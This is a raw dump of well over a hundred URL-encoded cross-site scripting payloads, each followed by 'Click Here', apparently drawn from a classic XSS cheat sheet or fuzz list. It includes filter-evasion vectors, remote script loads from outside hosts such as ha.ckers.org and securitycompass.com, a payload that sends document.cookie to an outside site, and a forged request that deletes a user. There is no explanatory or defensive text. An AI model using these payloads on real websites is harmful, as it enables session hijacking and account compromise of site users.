%26lt%3bIMG%20SRC%3d%26quot%3b%20%26amp%3b%2314%3b%20%20javascript%3aalert(%26apos%3bXSS%26apos%3b)%3b%26quot%3b%26gt%3bClick Here

perl%20-e%20%26apos%3bprint%20%26quot%3b%26amp%3b%26lt%3bSCR%5c0IPT%26gt%3balert(%26quot%3bXSS%26quot%3b)%26lt%3b%2fSCR%5c0IPT%26gt%3b%26quot%3b%3b%26apos%3b%20%26gt%3b%20outClick Here

%26lt%3bSCRIPT%2fXSS%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bBODY%20onload!%23$%%26amp%3b()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%26quot%3bXSS%26quot%3b)%26gt%3bClick Here

%26lt%3bSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejsClick Here

%26lt%3bSCRIPT%20SRC%3d%2f%2fha%2eckers%2eorg%2f%2ej%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26quot%3bjavascript%3aalert(%26apos%3bXSS%26apos%3b)%26quot%3bClick Here

%26lt%3bIFRAME%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%20%26lt%3bClick Here

%26lt%3bIMG%20%26quot%3b%26quot%3b%26quot%3b%26gt%3b%26lt%3bSCRIPT%26gt%3balert(%26quot%3bXSS%26quot%3b)%26lt%3b%2fSCRIPT%26gt%3b%26quot%3b%26gt%3bClick Here

%26lt%3b%26lt%3bSCRIPT%26gt%3balert(%26quot%3bXSS%26quot%3b)%3b%2f%2f%26lt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%26gt%3ba%3d%2fXSS%2fClick Here

%26lt%3bSCRIPT%20a%3d%26quot%3bblah%26quot%3b%20%26apos%3b%26apos%3b%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20%3d%26quot%3bblah%26quot%3b%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20%26quot%3ba%3d%26apos%3b%26gt%3b%26apos%3b%26quot%3b%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20a%3d%26quot%3b%26gt%3b%26quot%3b%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20a%3d%60%26gt%3b%60%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%26gt%3bdocument%2ewrite(%26quot%3b%26lt%3bSCRI%26quot%3b)%3b%26lt%3b%2fSCRIPT%26gt%3bPT%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2f66%2e102%2e7%2e147%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bSCRIPT%20a%3d%26quot%3b%3e%26apos%3b%3e%26quot%3b%20SRC%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%26quot%3b%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2f%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2f1113982867%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2f0x42%2e0x0000066%2e0x7%2e0x93%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2f0102%2e0146%2e0007%2e00000223%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bh%26%23x0A%3btt%26%2309%3bp%3a%2f%2f6%26amp%3b%2309%3b6%2e000146%2e0x7%2e147%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3b%2f%2fwww%2egoogle%2ecom%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3b%2f%2fgoogle%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2fha%2eckers%2eorg@google%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2fgoogle%3aha%2eckers%2eorg%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2fgoogle%2ecom%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2fwww%2egoogle%2ecom%2e%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%26lt%3bA%20HREF%3d%26quot%3bhttp%3a%2f%2fwww%2egohttp%3a%2f%2fwww%2egoogle%2ecom%2fogle%2ecom%2f%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%26quot%3bjavascript%3adocument%2elocation%3d%26apos%3bhttp%3a%2f%2fwww%2egoogle%2ecom%2f%26apos%3b%26quot%3b%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%3cimg%20SRC%3d%22jav%20ascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20SRC%3d%22%20%26%2314%3b%20javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbody%20onload!%23$%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3ddocument%2evulnerable%3dtrue%3b%3eClick Here

%3c%3cSCRIPT%3edocument%2evulnerable%3dtrue%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cscript%20%3cB%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3cimg%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22Click Here

%3ciframe%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%20%3cClick Here

%5c%22%3bdocument%2evulnerable%3dtrue%3b%3b%2f%2fClick Here

%3cscript%3ea%3d%2fXSS%2f%5cndocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3c%2ftitle%3e%3cSCRIPT%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3cinput%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbody%20BACKGROUND%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbody%20ONLOAD%3ddocument%2evulnerable%3dtrue%3b%3eClick Here

%3cimg%20DYNSRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20LOWSRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbgsound%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbr%20SIZE%3d%22%26%7bdocument%2evulnerable%3dtrue%7d%22%3eClick Here

%3cLAYER%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3e%3c%2fLAYER%3eClick Here

%3clink%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20SRC%3d'vbscript%3adocument%2evulnerable%3dtrue%3b'%3eClick Here

%3cstyle%3eli%20%7blist-style-image%3a%20url(%22javascript%3adocument%2evulnerable%3dtrue%3b%22)%3b%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSSClick Here

1script3document%2evulnerable%3dtrue%3b1%2fscript3Click Here

%3cmeta%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cmeta%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3e%3c%2fframeset%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3e%3c%2fiframe%3eClick Here

%3ctable%20BACKGROUND%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3ctable%3e%3cTD%20BACKGROUND%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cdiv%20STYLE%3d%22background-image%3a%20url(javascript%3adocument%2evulnerable%3dtrue%3b)%22%3eClick Here

%3cdiv%20STYLE%3d%22background-image%3a%20url(%26%231%3bjavascript%3adocument%2evulnerable%3dtrue%3b)%22%3eClick Here

%3cdiv%20STYLE%3d%22width%3a%20expression(document%2evulnerable%3dtrue)%3b%22%3eClick Here

%3cimg%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(document%2evulnerable%3dtrue)%22%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(document%2evulnerable%3dtrue)%22%3eClick Here

exp%2f%2a%3cA%20STYLE%3d'no%5cxss%3anoxss(%22%2a%2f%2f%2a%22)%3bxss%3aex%2f%2aXSS%2a%2f%2f%2a%2f%2a%2fpression(document%2evulnerable%3dtrue)'%3eClick Here

%3cstyle%3e@im%5cport'%5cja%5cvasc%5cript%3adocument%2evulnerable%3dtrue'%3b%3c%2fstyle%3eClick Here

%3cstyle%20TYPE%3d%22text%2fjavascript%22%3edocument%2evulnerable%3dtrue%3b%3c%2fstyle%3eClick Here

%3cstyle%3e%2eXSS%7bbackground-image%3aurl(%22javascript%3adocument%2evulnerable%3dtrue%22)%3b%7d%3c%2fSTYLE%3e%3cA%20CLASS%3dXSS%3e%3c%2fa%3eClick Here

%3cstyle%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3adocument%2evulnerable%3dtrue%22)%7d%3c%2fstyle%3eClick Here

%3c!--[if%20gte%20IE%204]%3e%3cSCRIPT%3edocument%2evulnerable%3dtrue%3b%3c%2fSCRIPT%3e%3c![endif]--%3eClick Here

%3cbase%20HREF%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%2f%2f%22%3eClick Here

%3cOBJECT%20classid%3dclsid%3aae24fdae-03c6-11d1-8b76-0080c744f389%3e%3cparam%20name%3durl%20value%3djavascript%3adocument%2evulnerable%3dtrue%3e%3c%2fobject%3eClick Here

%3cXML%20ID%3dI%3e%3cX%3e%3cC%3e%3c![%3cIMG%20SRC%3d%22javas]]%3c![cript%3adocument%2evulnerable%3dtrue%3b%22%3e]]%3c%2fC%3e%3c%2fX%3e%3c%2fxml%3e%3cSPAN%20DATASRC%3d%23I%20DATAFLD%3dC%20DATAFORMATAS%3dHTML%3e%3c%2fspan%3eClick Here

%3cXML%20ID%3d%22xss%22%3e%3cI%3e%3cB%3e%3cIMG%20SRC%3d%22javas%3c!--%20--%3ecript%3adocument%2evulnerable%3dtrue%22%3e%3c%2fB%3e%3c%2fI%3e%3c%2fXML%3e%3cSPAN%20DATASRC%3d%22%23xss%22%20DATAFLD%3d%22B%22%20DATAFORMATAS%3d%22HTML%22%3e%3c%2fspan%3eClick Here

%3c%3f%20echo('%3cSCR)'%3becho('IPT%3edocument%2evulnerable%3dtrue%3c%2fSCRIPT%3e')%3b%20%3f%3eClick Here

%3chead%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-document%2evulnerable%3dtrue%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%3cmeta%20HTTP-EQUIV%3d%22Set-Cookie%22%20Content%3d%22USERID%3d%3cSCRIPT%3edocument%2evulnerable%3dtrue%3c%2fSCRIPT%3e%22%3eClick Here

%3cdiv%20onmouseover%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

%3ca%20href%3d%22javascript%23document%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cinput%20type%3d%22image%22%20dynsrc%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20dynsrc%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbgsound%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%26%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3cimg%20src%3d%26%7bdocument%2evulnerable%3dtrue%3b%7d%3b%3eClick Here

%26%7bdocument%2evulnerable%3dtrue%3b%7d%3bClick Here

%3clink%20rel%3d%22stylesheet%22%20href%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3ciframe%20src%3d%22vbscript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%22mocha%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%22livescript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3ca%20href%3d%22about%3a%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3e%22%3eClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3burl%3djavascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cdiv%20style%3d%22background-image%3a%20url(javascript%3adocument%2evulnerable%3dtrue%3b)%3b%22%3eClick Here

%3cbody%20onload%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

%3cdiv%20style%3d%22behaviour%3a%20url([link%20to%20code])%3b%22%3eClick Here

%3cdiv%20style%3d%22binding%3a%20url([link%20to%20code])%3b%22%3eClick Here

%3cdiv%20style%3d%22width%3a%20expression(document%2evulnerable%3dtrue%3b)%3b%22%3eClick Here

%3cobject%20classid%3d%22clsid%3a%2e%2e%2e%22%20codebase%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cstyle%20type%3d%22text%2fjavascript%22%3edocument%2evulnerable%3dtrue%3b%3c%2fstyle%3eClick Here

%3cstyle%3e%3c!--%3c%2fstyle%3e%3cscript%3edocument%2evulnerable%3dtrue%3b%2f%2f--%3e%3c%2fscript%3eClick Here

%3c%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3c!--%20--%20--%3e%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3e%3c!--%20--%20--%3eClick Here

%3c![%3c!--]]%3cscript%3edocument%2evulnerable%3dtrue%3b%2f%2f--%3e%3c%2fscript%3eClick Here

%3cimg%20src%3d%22blah%22onmouseover%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%22blah%3e%22%20onmouseover%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

%3cxml%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cxml%20id%3d%22X%22%3e%3ca%3e%3cb%3e%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3e%3b%3c%2fb%3e%3c%2fa%3e%3c%2fxml%3eClick Here

[%5cxC0][%5cxBC]script%3edocument%2evulnerable%3dtrue%3b[%5cxC0][%5cxBC]%2fscript%3eClick Here

%3cdiv%20datafld%3d%22b%22%20dataformatas%3d%22html%22%20datasrc%3d%22%23X%22%3e%3c%2fdiv%3eClick Here

%3cmeta%20HTTP-EQUIV%3d%22Link%22%20Content%3d%22%3chttp%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ecss%3e%3b%20REL%3dstylesheet%22%3eClick Here

%3cstyle%3e@import'http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ecss'%3b%3c%2fstyle%3eClick Here

%3cstyle%3eBODY%7b-moz-binding%3aurl(%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxssmoz%2exml%23xss%22)%7d%3c%2fstyle%3eClick Here

%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fscriptlet%2ehtml%22%3e%3c%2fobject%3eClick Here

%3cHTML%20xmlns%3axss%3e%3c%3fimport%20namespace%3d%22xss%22%20implementation%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ehtc%22%3e%3cxss%3axss%3eXSS%3c%2fxss%3axss%3e%3c%2fhtml%3eClick Here

%3cscript%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejpg%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'%3cSCR'%22--%3e%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'IPT%20SRC%3dhttp%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%3e%3c%2fSCRIPT%3e'%22--%3eClick Here

%3cscript%20%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%22%3e%22%20''%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20%22a%3d'%3e'%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%22%3e'%3e%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%60%3e%60%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%3edocument%2ewrite(%22%3cSCRI%22)%3b%3c%2fSCRIPT%3ePT%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cdiv%20style%3d%22binding%3a%20url(http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs)%3b%22%3e%20[Mozilla]Click Here

%26quot%3b%26gt%3b%26lt%3bBODY%20onload!%23$%%26amp%3b()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%26quot%3bXSS%26quot%3b)%26gt%3bClick Here

%26lt%3b%2fbr%20style%3da%3aexpression(alert())%26gt%3bClick Here

%26lt%3b%2fscript%26gt%3b%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bClick Here

%26lt%3bbr%20size%3d%5c%26quot%3b%26amp%3b%7balert(%26%23039%3bXSS%26%23039%3b)%7d%5c%26quot%3b%26gt%3bClick Here

%26lt%3bscrscriptipt%26gt%3balert(1)%26lt%3b%2fscrscriptipt%26gt%3bClick Here

perl%20-e%20%26%23039%3bprint%20%5c%26quot%3b%26lt%3bSCR%5c0IPT%26gt%3balert(%5c%26quot%3bXSS%5c%26quot%3b)%26lt%3b%2fSCR%5c0IPT%26gt%3b%5c%26quot%3b%3b%26%23039%3b%20%26gt%3b%20outClick Here

perl%20-e%20%26%23039%3bprint%20%5c%26quot%3b%26lt%3bIMG%20SRC%3djava%5c0script%3aalert(%5c%26quot%3bXSS%5c%26quot%3b)%26gt%3b%5c%26quot%3b%3b%26%23039%3b%20%26gt%3b%20outClick Here

%3c~%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%3c~%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(window%2elocation%3d%22http%3a%2f%2fwww%2eprocheckup%2ecom%2f%3fsid%3d%22%2bdocument%2ecookie)%3eClick Here

%3c~%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%3c~%2fXSS%20STYLE%3dxss%3aexpression(alert('XSS'))%3eClick Here

%3c%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%22%3e%3cscript%3ealert('XSS')%3c%2fscript%3eClick Here

XSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

XSS%20STYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%3c%2fXSS%20STYLE%3dxss%3aexpression(alert('XSS'))%3eClick Here

%3c%3bSCRIPT%3e%3balert('%3bXSS'%3b)%3c%3b%2fSCRIPT%3e%3bClick Here

'%3b'%3b%3b!--%22%3b%3c%3bXSS%3e%3b%3d%26%3b%7b()%7dClick Here

%3c%3bSCRIPT%3e%3balert(String%2efromCharCode(88,83,83))%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bBASE%20HREF%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%2f%2f%22%3b%3e%3bClick Here

%3c%3bBGSOUND%20SRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bBODY%20BACKGROUND%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bBODY%20ONLOAD%3dalert('%3bXSS'%3b)%3e%3bClick Here

%3c%3bDIV%20STYLE%3d%22%3bbackground-image%3a%20url(javascript%3aalert('%3bXSS'%3b))%22%3b%3e%3bClick Here

%3c%3bDIV%20STYLE%3d%22%3bbackground-image%3a%20url(%26%3b%231%3bjavascript%3aalert('%3bXSS'%3b))%22%3b%3e%3bClick Here

%3c%3bIFRAME%20SRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3b%3c%3b%2fIFRAME%3e%3bClick Here

%3c%3bDIV%20STYLE%3d%22%3bwidth%3a%20expression(alert('%3bXSS'%3b))%3b%22%3b%3e%3bClick Here

%3c%3bFRAMESET%3e%3b%3c%3bFRAME%20SRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3b%3c%3b%2fFRAMESET%3e%3bClick Here

%3c%3bINPUT%20TYPE%3d%22%3bIMAGE%22%3b%20SRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3djavascript%3aalert('%3bXSS'%3b)%3e%3bClick Here

%3c%3bIMG%20DYNSRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20LOWSRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bhttp%3a%2f%2fwww%2ethesiteyouareon%2ecom%2fsomecommand%2ephp%3fsomevariables%3dmaliciouscode%22%3b%3e%3bClick Here

Redirect%20302%20%2fa%2ejpg%20http%3a%2f%2fvictimsite%2ecom%2fadmin%2easp%26%3bdeleteuserClick Here

exp%2f%2a%3c%3bXSS%20STYLE%3d'%3bno%5cxss%3anoxss(%22%3b%2a%2f%2f%2a%22%3b)%3bClick Here

%3c%3bSTYLE%3e%3bli%20%7blist-style-image%3a%20url(%22%3bjavascript%3aalert(%26%2339%3bXSS%26%2339%3b)%22%3b)%3b%7d%3c%3b%2fSTYLE%3e%3b%3c%3bUL%3e%3b%3c%3bLI%3e%3bXSSClick Here

%3c%3bIMG%20SRC%3d'%3bvbscript%3amsgbox(%22%3bXSS%22%3b)'%3b%3e%3bClick Here

%3c%3bLAYER%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%22%3b%3e%3b%3c%3b%2fLAYER%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3blivescript%3a[code]%22%3b%3e%3bClick Here

%BCscript%BEalert(%A2XSS%A2)%BC%2fscript%BEClick Here

%3c%3bMETA%20HTTP-EQUIV%3d%22%3brefresh%22%3b%20CONTENT%3d%22%3b0%3burl%3djavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bMETA%20HTTP-EQUIV%3d%22%3brefresh%22%3b%20CONTENT%3d%22%3b0%3burl%3ddata%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3b%3e%3bClick Here

%3c%3bMETA%20HTTP-EQUIV%3d%22%3brefresh%22%3b%20CONTENT%3d%22%3b0%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bmocha%3a[code]%22%3b%3e%3bClick Here

%3c%3bEMBED%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2eswf%22%3b%20AllowScriptAccess%3d%22%3balways%22%3b%3e%3b%3c%3b%2fEMBED%3e%3bClick Here

%3c%3bOBJECT%20TYPE%3d%22%3btext%2fx-scriptlet%22%3b%20DATA%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%22%3b%3e%3b%3c%3b%2fOBJECT%3e%3bClick Here

%3c%3bSTYLE%20TYPE%3d%22%3btext%2fjavascript%22%3b%3e%3balert('%3bXSS'%3b)%3b%3c%3b%2fSTYLE%3e%3bClick Here

a%3d%22%3bget%22%3b%3b%26%3b%2310%3bb%3d%22%3bURL(%22%3b%22%3b%3b%26%3b%2310%3bc%3d%22%3bjavascript%3a%22%3b%3b%26%3b%2310%3bd%3d%22%3balert('%3bXSS'%3b)%3b%22%3b)%22%3b%3b%26%2310%3beval(a%2bb%2bc%2bd)%3bClick Here

%3c%3bOBJECT%20classid%3dclsid%3aae24fdae-03c6-11d1-8b76-0080c744f389%3e%3b%3c%3bparam%20name%3durl%20value%3djavascript%3aalert('%3bXSS'%3b)%3e%3b%3c%3b%2fOBJECT%3e%3bClick Here

%3c%3bIMG%20STYLE%3d%22%3bxss%3aexpr%2f%2aXSS%2a%2fession(alert('%3bXSS'%3b))%22%3b%3e%3bClick Here

%3c%3bXSS%20STYLE%3d%22%3bxss%3aexpression(alert('%3bXSS'%3b))%22%3b%3e%3bClick Here

%3c%3bSTYLE%3e%3b%2eXSS%7bbackground-image%3aurl(%22%3bjavascript%3aalert('%3bXSS'%3b)%22%3b)%3b%7d%3c%3b%2fSTYLE%3e%3b%3c%3bA%20CLASS%3dXSS%3e%3b%3c%3b%2fA%3e%3bClick Here

%3c%3bSTYLE%20type%3d%22%3btext%2fcss%22%3b%3e%3bBODY%7bbackground%3aurl(%22%3bjavascript%3aalert('%3bXSS'%3b)%22%3b)%7d%3c%3b%2fSTYLE%3e%3bClick Here

%3c%3bLINK%20REL%3d%22%3bstylesheet%22%3b%20HREF%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bLINK%20REL%3d%22%3bstylesheet%22%3b%20HREF%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%22%3b%3e%3bClick Here

%3c%3bSTYLE%3e%3b@import'%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss'%3b%3b%3c%3b%2fSTYLE%3e%3bClick Here

%3c%3bMETA%20HTTP-EQUIV%3d%22%3bLink%22%3b%20Content%3d%22%3b%3c%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%3e%3b%3b%20REL%3dstylesheet%22%3b%3e%3bClick Here

%3c%3bSTYLE%3e%3bBODY%7b-moz-binding%3aurl(%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxssmoz%2exml%23xss%22%3b)%7d%3c%3b%2fSTYLE%3e%3bClick Here

